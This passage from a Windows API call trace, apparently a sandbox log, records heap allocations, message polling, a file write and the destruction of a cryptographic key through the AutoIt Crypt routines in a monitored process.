hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0227.903] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.903] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.903] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.903] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0227.903] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.903] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.911] WriteFile (in: hFile=0x2d0, lpBuffer=0x2ee0dc0*, nNumberOfBytesToWrite=0x13548, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ee0dc0*, lpNumberOfBytesWritten=0x8cf5e4*=0x13548, lpOverlapped=0x0) returned 1 [0227.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee0dc0 | out: hHeap=0x970000) returned 1 [0227.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0227.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0227.915] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0227.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0227.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55088 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0227.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.916] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0227.917] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0227.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e510d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0227.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.919] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0227.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.920] CryptDestroyKey (hKey=0xa87410) returned 1 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0227.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0227.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0227.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0227.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.978] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.978] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0227.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.979] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0227.979] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0227.979] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0227.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: 